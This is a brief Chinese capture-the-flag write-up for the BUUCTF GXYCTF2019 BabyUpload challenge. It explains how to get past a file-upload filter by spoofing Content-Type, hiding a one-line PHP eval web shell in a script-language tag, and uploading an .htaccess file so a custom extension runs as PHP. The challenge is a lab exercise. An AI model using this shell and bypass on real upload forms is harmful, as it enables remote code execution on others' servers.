BUUCTF：[GXYCTF2019]BabyUpload

BUUCTF：[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

有几个上传限制，一起来看一下

1、后缀名不能有ph！对于文件后缀名的限制，无法绕过这里

2、上传类型也太露骨了吧！对Content-Type的限制，修改为image/jpeg即可绕过

3、诶，别蒙我啊，这标志明显还是php啊对上传文件的内容进行了检测，不能含有<?，这里的PHP版本为：PHP/5.6.23，可以使用<script language="php">eval($_POST['mochu7']);</script>绕过

只有文件名那里无法直接绕过，本来看到这里的WEB应用服务器是openresty没有直接想到.htaccess，后经查阅资料发现nginx也是可以支持.htaccess的，所以这里就可以利用上传一个.htaccess文件将别的后缀名文件内容解析为php程序

AddType application/x-httpd-php .mochu

然后上传shell即可

有disable_functions，但看了一下被禁用的函数，还是可以进行目录浏览和文件读取